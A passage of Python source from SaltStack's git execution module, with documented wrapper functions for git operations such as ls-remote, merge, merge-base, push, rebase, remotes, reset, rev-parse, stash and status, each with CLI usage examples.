.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
        Key can also be specified as a SaltStack file server URL, e.g. salt://location/identity_file
.. versionchanged:: 2016.3.0
https_user
Set HTTP Basic Auth username. Only accepted for HTTPS URLs.
.. versionadded:: 2015.5.0
https_pass
Set HTTP Basic Auth password. Only accepted for HTTPS URLs.
.. versionadded:: 2015.5.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-ls-remote(1)`: http://git-scm.com/docs/git-ls-remote
CLI Example:
.. code-block:: bash
salt myminion git.ls_remote /path/to/repo origin master
salt myminion git.ls_remote remote=https://mydomain.tld/repo.git ref=mytag opts='--tags'
'''
if cwd is not None:
cwd = _expand_path(cwd, user)
try:
remote = salt.utils.url.add_http_basic_auth(remote,
https_user,
https_pass,
https_only=True)
except ValueError as exc:
        raise SaltInvocationError(str(exc))
command = ['git', 'ls-remote']
command.extend(_format_opts(opts))
if not isinstance(remote, six.string_types):
remote = str(remote)
command.extend([remote])
if ref:
if not isinstance(ref, six.string_types):
ref = str(ref)
command.extend([ref])
output = _git_run(command,
cwd=cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)['stdout']
ret = {}
for line in output.splitlines():
try:
ref_sha1, ref_name = line.split(None, 1)
        except ValueError:
continue
ret[ref_name] = ref_sha1
return ret
def merge(cwd,
rev=None,
opts='',
user=None,
ignore_retcode=False,
**kwargs):
'''
Interface to `git-merge(1)`_
cwd
The path to the git checkout
rev
Revision to merge into the current branch. If not specified, the remote
tracking branch will be merged.
.. versionadded:: 2015.8.0
branch
        The remote branch or revision to merge into the current branch
.. deprecated:: 2015.8.0
Use ``rev`` instead.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-merge(1)`: http://git-scm.com/docs/git-merge
CLI Example:
.. code-block:: bash
# Fetch first...
salt myminion git.fetch /path/to/repo
# ... then merge the remote tracking branch
salt myminion git.merge /path/to/repo
# .. or merge another rev
salt myminion git.merge /path/to/repo rev=upstream/foo
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
branch_ = kwargs.pop('branch', None)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
cwd = _expand_path(cwd, user)
if branch_:
salt.utils.warn_until(
'Nitrogen',
'The \'branch\' argument to git.merge has been deprecated, please '
'use \'rev\' instead.'
)
rev = branch_
command = ['git', 'merge']
command.extend(_format_opts(opts))
if rev:
if not isinstance(rev, six.string_types):
rev = str(rev)
command.append(rev)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def merge_base(cwd,
refs=None,
octopus=False,
is_ancestor=False,
independent=False,
fork_point=None,
opts='',
user=None,
ignore_retcode=False,
**kwargs):
'''
.. versionadded:: 2015.8.0
Interface to `git-merge-base(1)`_.
cwd
The path to the git checkout
refs
Any refs/commits to check for a merge base. Can be passed as a
comma-separated list or a Python list.
all : False
Return a list of all matching merge bases. Not compatible with any of
the below options except for ``octopus``.
octopus : False
If ``True``, then this function will determine the best common
ancestors of all specified commits, in preparation for an n-way merge.
See here_ for a description of how these bases are determined.
Set ``all`` to ``True`` with this option to return all computed merge
bases, otherwise only the "best" will be returned.
is_ancestor : False
If ``True``, then instead of returning the merge base, return a
boolean telling whether or not the first commit is an ancestor of the
second commit.
.. note::
This option requires two commits to be passed.
.. versionchanged:: 2015.8.2
Works properly in git versions older than 1.8.0, where the
``--is-ancestor`` CLI option is not present.
independent : False
If ``True``, this function will return the IDs of the refs/commits
passed which cannot be reached by another commit.
fork_point
If passed, then this function will return the commit where the
commit diverged from the ref specified by ``fork_point``. If no fork
point is found, ``None`` is returned.
.. note::
At most one commit is permitted to be passed if a ``fork_point`` is
specified. If no commits are passed, then ``HEAD`` is assumed.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
This option should not be necessary unless new CLI arguments are
added to `git-merge-base(1)`_ and are not yet supported in Salt.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
        If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. _`git-merge-base(1)`: http://git-scm.com/docs/git-merge-base
.. _here: http://git-scm.com/docs/git-merge-base#_discussion
CLI Examples:
.. code-block:: bash
salt myminion git.merge_base /path/to/repo HEAD upstream/mybranch
salt myminion git.merge_base /path/to/repo 8f2e542,4ad8cab,cdc9886 octopus=True
salt myminion git.merge_base /path/to/repo refs=8f2e542,4ad8cab,cdc9886 independent=True
salt myminion git.merge_base /path/to/repo refs=8f2e542,4ad8cab is_ancestor=True
salt myminion git.merge_base /path/to/repo fork_point=upstream/master
salt myminion git.merge_base /path/to/repo refs=mybranch fork_point=upstream/master
'''
cwd = _expand_path(cwd, user)
kwargs = salt.utils.clean_kwargs(**kwargs)
all_ = kwargs.pop('all', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if all_ and (independent or is_ancestor or fork_point):
raise SaltInvocationError(
'The \'all\' argument is not compatible with \'independent\', '
'\'is_ancestor\', or \'fork_point\''
)
if refs is None:
refs = []
elif not isinstance(refs, (list, tuple)):
refs = [x.strip() for x in str(refs).split(',')]
mutually_exclusive_count = len(
[x for x in (octopus, independent, is_ancestor, fork_point) if x]
)
if mutually_exclusive_count > 1:
raise SaltInvocationError(
'Only one of \'octopus\', \'independent\', \'is_ancestor\', and '
'\'fork_point\' is permitted'
)
elif is_ancestor:
if len(refs) != 2:
raise SaltInvocationError(
'Two refs/commits are required if \'is_ancestor\' is True'
)
elif fork_point:
if len(refs) > 1:
raise SaltInvocationError(
'At most one ref/commit can be passed if \'fork_point\' is '
'specified'
)
elif not refs:
refs = ['HEAD']
if not isinstance(fork_point, six.string_types):
fork_point = str(fork_point)
if is_ancestor:
if _LooseVersion(version(versioninfo=False)) < _LooseVersion('1.8.0'):
# Pre 1.8.0 git doesn't have --is-ancestor, so the logic here is a
# little different. First we need to resolve the first ref to a
# full SHA1, and then if running git merge-base on both commits
# returns an identical commit to the resolved first ref, we know
# that the first ref is an ancestor of the second ref.
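            # In other words, refs[0] is an ancestor of refs[1] if and only
            # if 'git merge-base refs[0] refs[1]' resolves to the same
            # commit as 'git rev-parse --verify refs[0]'.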
first_commit = rev_parse(cwd,
rev=refs[0],
opts=['--verify'],
user=user,
ignore_retcode=ignore_retcode)
return merge_base(cwd,
refs=refs,
is_ancestor=False,
user=user,
ignore_retcode=ignore_retcode) == first_commit
command = ['git', 'merge-base']
command.extend(_format_opts(opts))
if all_:
command.append('--all')
if octopus:
command.append('--octopus')
elif is_ancestor:
command.append('--is-ancestor')
elif independent:
command.append('--independent')
elif fork_point:
command.extend(['--fork-point', fork_point])
for ref in refs:
if isinstance(ref, six.string_types):
command.append(ref)
else:
command.append(str(ref))
result = _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode,
                      failhard=not is_ancestor)
if is_ancestor:
return result['retcode'] == 0
all_bases = result['stdout'].splitlines()
if all_:
return all_bases
return all_bases[0]
def merge_tree(cwd,
ref1,
ref2,
base=None,
user=None,
ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Interface to `git-merge-tree(1)`_, shows the merge results and conflicts
from a 3-way merge without touching the index.
cwd
The path to the git checkout
ref1
First ref/commit to compare
ref2
Second ref/commit to compare
base
The base tree to use for the 3-way-merge. If not provided, then
:py:func:`git.merge_base <salt.modules.git.merge_base>` will be invoked
on ``ref1`` and ``ref2`` to determine the merge base to use.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
        If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. _`git-merge-tree(1)`: http://git-scm.com/docs/git-merge-tree
CLI Examples:
.. code-block:: bash
salt myminion git.merge_tree /path/to/repo HEAD upstream/dev
salt myminion git.merge_tree /path/to/repo HEAD upstream/dev base=aaf3c3d
'''
cwd = _expand_path(cwd, user)
command = ['git', 'merge-tree']
if not isinstance(ref1, six.string_types):
ref1 = str(ref1)
if not isinstance(ref2, six.string_types):
ref2 = str(ref2)
if base is None:
try:
base = merge_base(cwd, refs=[ref1, ref2])
except (SaltInvocationError, CommandExecutionError):
raise CommandExecutionError(
'Unable to determine merge base for {0} and {1}'
.format(ref1, ref2)
)
command.extend([base, ref1, ref2])
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def pull(cwd, opts='', user=None, identity=None, ignore_retcode=False, saltenv='base'):
'''
Interface to `git-pull(1)`_
cwd
The path to the git checkout
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
        Key can also be specified as a SaltStack file server URL, e.g. salt://location/identity_file
.. versionchanged:: 2016.3.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-pull(1)`: http://git-scm.com/docs/git-pull
CLI Example:
.. code-block:: bash
salt myminion git.pull /path/to/repo opts='--rebase origin master'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'pull']
command.extend(_format_opts(opts))
return _git_run(command,
cwd=cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)['stdout']
def push(cwd,
remote=None,
ref=None,
opts='',
user=None,
identity=None,
ignore_retcode=False,
saltenv='base',
**kwargs):
'''
Interface to `git-push(1)`_
cwd
The path to the git checkout
remote
        Name of the remote to which the ref should be pushed
.. versionadded:: 2015.8.0
ref : master
Name of the ref to push
.. note::
Being a refspec_, this argument can include a colon to define local
and remote ref names.
branch
Name of the ref to push
.. deprecated:: 2015.8.0
Use ``ref`` instead
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
        Key can also be specified as a SaltStack file server URL, e.g. salt://location/identity_file
.. versionchanged:: 2016.3.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-push(1)`: http://git-scm.com/docs/git-push
.. _refspec: http://git-scm.com/book/en/v2/Git-Internals-The-Refspec
CLI Example:
.. code-block:: bash
# Push master as origin/master
salt myminion git.push /path/to/repo origin master
# Push issue21 as upstream/develop
salt myminion git.push /path/to/repo upstream issue21:develop
# Delete remote branch 'upstream/temp'
salt myminion git.push /path/to/repo upstream :temp
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
branch_ = kwargs.pop('branch', None)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
cwd = _expand_path(cwd, user)
if branch_:
salt.utils.warn_until(
'Nitrogen',
'The \'branch\' argument to git.push has been deprecated, please '
'use \'ref\' instead.'
)
ref = branch_
command = ['git', 'push']
command.extend(_format_opts(opts))
if not isinstance(remote, six.string_types):
remote = str(remote)
if not isinstance(ref, six.string_types):
ref = str(ref)
command.extend([remote, ref])
return _git_run(command,
cwd=cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)['stdout']
def rebase(cwd, rev='master', opts='', user=None, ignore_retcode=False):
'''
Interface to `git-rebase(1)`_
cwd
The path to the git checkout
rev : master
The revision to rebase onto the current branch
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-rebase(1)`: http://git-scm.com/docs/git-rebase
CLI Example:
.. code-block:: bash
salt myminion git.rebase /path/to/repo master
salt myminion git.rebase /path/to/repo 'origin master'
salt myminion git.rebase /path/to/repo origin/master opts='--onto newbranch'
'''
cwd = _expand_path(cwd, user)
opts = _format_opts(opts)
    if any(x in ('-i', '--interactive') for x in opts):
raise SaltInvocationError('Interactive rebases are not supported')
command = ['git', 'rebase']
command.extend(opts)
if not isinstance(rev, six.string_types):
rev = str(rev)
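    # 'rev' may contain more than one whitespace-delimited argument (e.g.
    # 'origin master'), so split it shell-style rather than appending it
    # as a single argument.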
command.extend(salt.utils.shlex_split(rev))
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def remote_get(cwd,
remote='origin',
user=None,
redact_auth=True,
ignore_retcode=False):
'''
Get the fetch and push URL for a specific remote
cwd
The path to the git checkout
remote : origin
Name of the remote to query
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
redact_auth : True
Set to ``False`` to include the username/password if the remote uses
HTTPS Basic Auth. Otherwise, this information will be redacted.
.. warning::
Setting this to ``False`` will not only reveal any HTTPS Basic Auth
that is configured, but the return data will also be written to the
job cache. When possible, it is recommended to use SSH for
authentication.
.. versionadded:: 2015.5.6
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Examples:
.. code-block:: bash
salt myminion git.remote_get /path/to/repo
salt myminion git.remote_get /path/to/repo upstream
'''
cwd = _expand_path(cwd, user)
all_remotes = remotes(cwd,
user=user,
redact_auth=redact_auth,
ignore_retcode=ignore_retcode)
if remote not in all_remotes:
raise CommandExecutionError(
'Remote \'{0}\' not present in git checkout located at {1}'
.format(remote, cwd)
)
return all_remotes[remote]
def remote_refs(url,
heads=False,
tags=False,
user=None,
identity=None,
https_user=None,
https_pass=None,
ignore_retcode=False,
saltenv='base'):
'''
.. versionadded:: 2015.8.0
Return the remote refs for the specified URL
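    Like :py:func:`git.ls_remote <salt.modules.git.ls_remote>`, the return
    data maps ref names to SHA1 hashes, e.g. (values are hypothetical):
    .. code-block:: python
        {'refs/heads/develop': 'aabbccddeeff...',
         'refs/tags/v1.2.3': '0011223344...'}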
url
URL of the remote repository
heads : False
Restrict output to heads. Can be combined with ``tags``.
tags : False
Restrict output to tags. Can be combined with ``heads``.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
        Key can also be specified as a SaltStack file server URL, e.g. salt://location/identity_file
.. versionchanged:: 2016.3.0
https_user
Set HTTP Basic Auth username. Only accepted for HTTPS URLs.
https_pass
Set HTTP Basic Auth password. Only accepted for HTTPS URLs.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
CLI Example:
.. code-block:: bash
salt myminion git.remote_refs https://github.com/saltstack/salt.git
'''
command = ['git', 'ls-remote']
if heads:
command.append('--heads')
if tags:
command.append('--tags')
try:
command.append(salt.utils.url.add_http_basic_auth(url,
https_user,
https_pass,
https_only=True))
except ValueError as exc:
        raise SaltInvocationError(str(exc))
output = _git_run(command,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)['stdout']
ret = {}
for line in salt.utils.itertools.split(output, '\n'):
try:
sha1_hash, ref_name = line.split(None, 1)
except ValueError:
continue
ret[ref_name] = sha1_hash
return ret
def remote_set(cwd,
url,
remote='origin',
user=None,
https_user=None,
https_pass=None,
push_url=None,
push_https_user=None,
push_https_pass=None,
ignore_retcode=False):
'''
cwd
The path to the git checkout
url
Remote URL to set
remote : origin
Name of the remote to set
push_url
If unset, the push URL will be identical to the fetch URL.
.. versionadded:: 2015.8.0
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
https_user
Set HTTP Basic Auth username. Only accepted for HTTPS URLs.
.. versionadded:: 2015.5.0
https_pass
Set HTTP Basic Auth password. Only accepted for HTTPS URLs.
.. versionadded:: 2015.5.0
push_https_user
Set HTTP Basic Auth user for ``push_url``. Ignored if ``push_url`` is
unset. Only accepted for HTTPS URLs.
.. versionadded:: 2015.8.0
push_https_pass
Set HTTP Basic Auth password for ``push_url``. Ignored if ``push_url``
is unset. Only accepted for HTTPS URLs.
.. versionadded:: 2015.8.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Examples:
.. code-block:: bash
salt myminion git.remote_set /path/to/repo git@github.com:user/repo.git
salt myminion git.remote_set /path/to/repo git@github.com:user/repo.git remote=upstream
salt myminion git.remote_set /path/to/repo https://github.com/user/repo.git remote=upstream push_url=git@github.com:user/repo.git
'''
# Check if remote exists
if remote in remotes(cwd, user=user):
log.debug(
'Remote \'{0}\' already exists in git checkout located at {1}, '
'removing so it can be re-added'.format(remote, cwd)
)
command = ['git', 'remote', 'rm', remote]
_git_run(command, cwd=cwd, runas=user, ignore_retcode=ignore_retcode)
# Add remote
try:
url = salt.utils.url.add_http_basic_auth(url,
https_user,
https_pass,
https_only=True)
except ValueError as exc:
        raise SaltInvocationError(str(exc))
if not isinstance(remote, six.string_types):
remote = str(remote)
if not isinstance(url, six.string_types):
url = str(url)
command = ['git', 'remote', 'add', remote, url]
_git_run(command, cwd=cwd, runas=user, ignore_retcode=ignore_retcode)
if push_url:
if not isinstance(push_url, six.string_types):
push_url = str(push_url)
try:
push_url = salt.utils.url.add_http_basic_auth(push_url,
push_https_user,
push_https_pass,
https_only=True)
except ValueError as exc:
            raise SaltInvocationError(str(exc))
command = ['git', 'remote', 'set-url', '--push', remote, push_url]
_git_run(command, cwd=cwd, runas=user, ignore_retcode=ignore_retcode)
return remote_get(cwd=cwd,
remote=remote,
user=user,
ignore_retcode=ignore_retcode)
def remotes(cwd, user=None, redact_auth=True, ignore_retcode=False):
'''
Get fetch and push URLs for each remote in a git checkout
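    The return data maps each remote name to its fetch and push URLs, e.g.
    (URL is illustrative):
    .. code-block:: python
        {'origin': {'fetch': 'https://github.com/user/repo.git',
                    'push': 'https://github.com/user/repo.git'}}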
cwd
The path to the git checkout
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
redact_auth : True
Set to ``False`` to include the username/password for authenticated
remotes in the return data. Otherwise, this information will be
redacted.
.. warning::
Setting this to ``False`` will not only reveal any HTTPS Basic Auth
that is configured, but the return data will also be written to the
job cache. When possible, it is recommended to use SSH for
authentication.
.. versionadded:: 2015.5.6
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Example:
.. code-block:: bash
salt myminion git.remotes /path/to/repo
'''
cwd = _expand_path(cwd, user)
command = ['git', 'remote', '--verbose']
ret = {}
output = _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
for remote_line in salt.utils.itertools.split(output, '\n'):
try:
remote, remote_info = remote_line.split(None, 1)
except ValueError:
continue
try:
remote_url, action = remote_info.rsplit(None, 1)
except ValueError:
continue
# Remove parenthesis
action = action.lstrip('(').rstrip(')').lower()
if action not in ('fetch', 'push'):
log.warning(
'Unknown action \'{0}\' for remote \'{1}\' in git checkout '
'located in {2}'.format(action, remote, cwd)
)
continue
if redact_auth:
remote_url = salt.utils.url.redact_http_basic_auth(remote_url)
ret.setdefault(remote, {})[action] = remote_url
return ret
def reset(cwd, opts='', user=None, ignore_retcode=False):
'''
Interface to `git-reset(1)`_, returns the stdout from the git command
cwd
The path to the git checkout
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-reset(1)`: http://git-scm.com/docs/git-reset
CLI Examples:
.. code-block:: bash
# Soft reset to a specific commit ID
salt myminion git.reset /path/to/repo ac3ee5c
# Hard reset
salt myminion git.reset /path/to/repo opts='--hard origin/master'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'reset']
command.extend(_format_opts(opts))
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def rev_parse(cwd, rev=None, opts='', user=None, ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Interface to `git-rev-parse(1)`_
cwd
The path to the git checkout
rev
Revision to parse. See the `SPECIFYING REVISIONS`_ section of the
`git-rev-parse(1)`_ manpage for details on how to format this argument.
        This argument is optional when using the options in the `Options for
        Files`_ section of the `git-rev-parse(1)`_ manpage.
opts
Any additional options to add to the command line, in a single string
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. _`git-rev-parse(1)`: http://git-scm.com/docs/git-rev-parse
.. _`SPECIFYING REVISIONS`: http://git-scm.com/docs/git-rev-parse#_specifying_revisions
.. _`Options for Files`: http://git-scm.com/docs/git-rev-parse#_options_for_files
CLI Examples:
.. code-block:: bash
# Get the full SHA1 for HEAD
salt myminion git.rev_parse /path/to/repo HEAD
# Get the short SHA1 for HEAD
salt myminion git.rev_parse /path/to/repo HEAD opts='--short'
# Get the develop branch's upstream tracking branch
salt myminion git.rev_parse /path/to/repo 'develop@{upstream}' opts='--abbrev-ref'
# Get the SHA1 for the commit corresponding to tag v1.2.3
salt myminion git.rev_parse /path/to/repo 'v1.2.3^{commit}'
# Find out whether or not the repo at /path/to/repo is a bare repository
salt myminion git.rev_parse /path/to/repo opts='--is-bare-repository'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'rev-parse']
command.extend(_format_opts(opts))
if rev is not None:
if not isinstance(rev, six.string_types):
rev = str(rev)
command.append(rev)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def revision(cwd, rev='HEAD', short=False, user=None, ignore_retcode=False):
'''
Returns the SHA1 hash of a given identifier (hash, branch, tag, HEAD, etc.)
cwd
The path to the git checkout
rev : HEAD
The revision
short : False
If ``True``, return an abbreviated SHA1 git hash
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Example:
.. code-block:: bash
salt myminion git.revision /path/to/repo mybranch
'''
cwd = _expand_path(cwd, user)
if not isinstance(rev, six.string_types):
rev = str(rev)
command = ['git', 'rev-parse']
if short:
command.append('--short')
command.append(rev)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def rm_(cwd, filename, opts='', user=None, ignore_retcode=False):
'''
Interface to `git-rm(1)`_
cwd
The path to the git checkout
filename
The location of the file/directory to remove, relative to ``cwd``
.. note::
To remove a directory, ``-r`` must be part of the ``opts``
parameter.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-rm(1)`: http://git-scm.com/docs/git-rm
CLI Examples:
.. code-block:: bash
salt myminion git.rm /path/to/repo foo/bar.py
salt myminion git.rm /path/to/repo foo/bar.py opts='--dry-run'
salt myminion git.rm /path/to/repo foo/baz opts='-r'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'rm']
command.extend(_format_opts(opts))
command.extend(['--', filename])
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def stash(cwd, action='save', opts='', user=None, ignore_retcode=False):
'''
Interface to `git-stash(1)`_, returns the stdout from the git command
cwd
The path to the git checkout
opts
Any additional options to add to the command line, in a single string.
Use this to complete the ``git stash`` command by adding the remaining
arguments (i.e. ``'save <stash comment>'``, ``'apply stash@{2}'``,
``'show'``, etc.). Omitting this argument will simply run ``git
stash``.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-stash(1)`: http://git-scm.com/docs/git-stash
CLI Examples:
.. code-block:: bash
salt myminion git.stash /path/to/repo save opts='work in progress'
salt myminion git.stash /path/to/repo apply opts='stash@{1}'
salt myminion git.stash /path/to/repo drop opts='stash@{1}'
salt myminion git.stash /path/to/repo list
'''
cwd = _expand_path(cwd, user)
if not isinstance(action, six.string_types):
# No numeric actions but this will prevent a traceback when the git
# command is run.
action = str(action)
command = ['git', 'stash', action]
command.extend(_format_opts(opts))
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def status(cwd, user=None, ignore_retcode=False):
'''
.. versionchanged:: 2015.8.0
Return data has changed from a list of lists to a dictionary
Returns the changes to the repository
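    The keys of the return dictionary are the change types and the values
    are lists of affected paths, e.g. (paths are illustrative):
    .. code-block:: python
        {'modified': ['foo/bar.py'], 'untracked': ['baz.txt']}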
cwd
The path to the git checkout
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Example:
.. code-block:: bash
salt myminion git.status /path/to/repo
'''
cwd = _expand_path(cwd, user)
state_map = {
'M': 'modified',
'A': 'new',
'D': 'deleted',
'??': 'untracked'
}
ret = {}
command = ['git', 'status', '-z', '--porcelain']
output = _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
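    # With --porcelain and -z, each entry is NUL-terminated and takes the
    # form 'XY path' (e.g. 'M  foo/bar.py' or '?? baz.txt'), where XY is
    # the two-character status code.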
for line in output.split('\0'):
try:
state, filename = line.split(None, 1)
except ValueError:
continue
ret.setdefault(state_map.get(state, state), []).append(filename)
return ret
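# Illustrative sketch (added note, not part of this module): given porcelain
# output such as 'M  foo/bar.py\0?? notes.txt\0', the loop above produces:
#
#     status('/path/to/repo')
#     # -> {'modified': ['foo/bar.py'], 'untracked': ['notes.txt']}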
def submodule(cwd,
command,
opts='',
user=None,
identity=None,
ignore_retcode=False,
saltenv='base',
**kwargs):
'''
.. versionchanged:: 2015.8.0
Added the ``command`` argument to allow for operations other than
``update`` to be run on submodules, and deprecated the ``init``
argument. To do a submodule update with ``init=True`` moving forward,
use ``command=update opts='--init'``
Interface to `git-submodule(1)`_
cwd
The path to the submodule
command
        Submodule command to run, see `git-submodule(1)`_ for
more information. Any additional arguments after the command (such as
the URL when adding a submodule) must be passed in the ``opts``
parameter.
.. versionadded:: 2015.8.0
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
init : False
If ``True``, ensures that new submodules are initialized
.. deprecated:: 2015.8.0
Pass ``init`` as the ``command`` parameter, or include ``--init``
in the ``opts`` param with ``command`` set to update.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
